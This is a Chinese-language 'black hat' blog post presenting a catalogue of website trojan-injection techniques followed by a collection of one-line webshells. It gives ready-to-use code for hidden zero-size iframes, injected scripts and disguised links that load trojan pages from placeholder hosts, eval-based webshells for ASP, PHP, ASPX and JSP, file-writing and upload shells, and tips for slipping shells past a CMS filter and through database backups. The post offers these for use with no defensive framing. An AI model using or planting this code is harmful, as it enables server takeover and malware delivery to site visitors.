七夕云黑帽博客-专注互联网络安全-webshell七夕,七夕黑帽博客,QQ905690245

网站挂马方法大全

2018-3-30 23:34 作者:Mr.刘 | 黑客技术 | 标签: 网站挂马方法大全


u=1771502486,3317170356&fm=26&gp=0.jpg

 

挂马大全


一:框架挂马

   <iframe src=地址 width=0 height=0></iframe> 

二:js文件挂马

   首先将以下代码
   document.write("<iframe width='0' height='0' src='地址'></iframe>");
   保存为xxx.js,
   则JS挂马代码为
   <script language=javascript src=xxx.js></script> 

三:js变形加密

   <SCRIPT language="JScript.Encode"          src=http://www.xxx.com/muma.txt></script> 
   muma.txt可改成任意后缀

四:body挂马

   <body></body>

五:隐蔽挂马

   top.document.body.innerHTML = top.document.body.innerHTML +    '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

六:css中挂马

   body { 
   background-image: url('javascript:document.write("<script          src=http://www.XXX.net/muma.js></script>")')} 

七:JAJA挂马

  <SCRIPT language=javascript>      
  window.open  ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro  llbars=no,width=1,height=1");  
  </script>

八:图片伪装

  <html>
  <iframe src="网马地址" height=0 width=0></iframe>
  <img src="图片地址"></center>
  </html>

九:伪装调用:

   <frameset rows="444,0" cols="*">
   <frame src="打开网页" framborder="no" scrolling="auto" noresize    marginwidth="0"margingheight="0">
   <frame src="网马地址" frameborder="no" scrolling="no"   noresize    marginwidth="0"margingheight="0">
   </frameset>

十:高级欺骗

   <a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,

no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

比较全的webshell一句话包括ASP,PHP,ASPX,JSP

asp一句话木马程序代码

<%eval request("sb")%>

程序代码

<%execute request("sb")%>

程序代码

<%execute(request("sb"))%>

程序代码

<%execute request("sb")%><%'<% loop <%:%>

程序代码

<%'<% loop <%:%><%execute request("sb")%>

程序代码

<%execute request("sb")'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request("sb"))</script>

程序代码

%><%Eval(Request(chr(35)))%><%

程序代码

<%eval request("sb")%>

程序代码

<%ExecuteGlobal request("sb")%>

程序代码

if Request("sb")<>"" then ExecuteGlobal request("sb") end if
//容错代码

程序代码

<%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
<%
var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'};
lcx.性别((lcx.名字)+'');
%>
//使用冰狐
一句话客户端链接

程序代码

<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '参数SubCode作为过程代码
o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之,同时压入6个基对象作为参数
%>

调用示例:
程序代码

http://localhost/tmp.asp?SubCode=sub%20e%28Serv

php一句话

程序代码

<?php eval($_POST[sb])?>

程序代码

<?php @eval($_POST[sb])?> //容错代码

程序代码

<?php assert($_POST[sb]);?> //使用lanker一句话客户端的专家模式执行相关的php语句

程序代码

<?$_POST['sa']($_POST['sb']);?>

程序代码

<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>

程序代码

<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>

//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入

程序代码

<O>h=@eval($_POST[c]);</O>

程序代码

<script language="php">@eval($_POST[sb])</script>

//绕过<?限制的一句话

JSP一句话

程序代码

<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

提交客户端

程序代码

<form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
<input type=submit value="提交">
</form>

ASPX一句话

程序代码

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

程序代码
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>

//Jscript的asp.net一句话

程序代码

<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"])   ); }%>

//C#的asp.net一句话

程序代码

<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>

//VB的asp.net一句话

第一:114la网址导航系统后台getwebshell,最新版本,已经禁止了直接输入<?php这样的代码,所以可以试用<script language="php">...<script>来绕过

第二,使用菜刀的附加数据功能可以出现很多转换.所以还是仔细阅读下菜刀的readme.txt,上面的代码来自LCX的博客

第三,使用mssql备份一句话的时候,特别是asp.net和jsp,因为代码过长,所以,需要再代码前面和后面多加空格等垃圾字符保证代码完整性,这个跟备份bat到启动项一个原理.

  • blogger
分享本文至:

文章作者:Mr.刘 作者QQ:905690245
文章地址:https://www.blog.qixiwangluo.com:443/?post=4
版权所有 © 转载时必须以链接形式注明作者和原始出处!

发表评论:



如有侵犯您的版权请发送QQ邮件至905690245@qq.com

CopyRight 2018-2099 七夕云黑帽博客-专注互联网络安全.All rights reserved.

技术支持:攀枝花市七夕云网络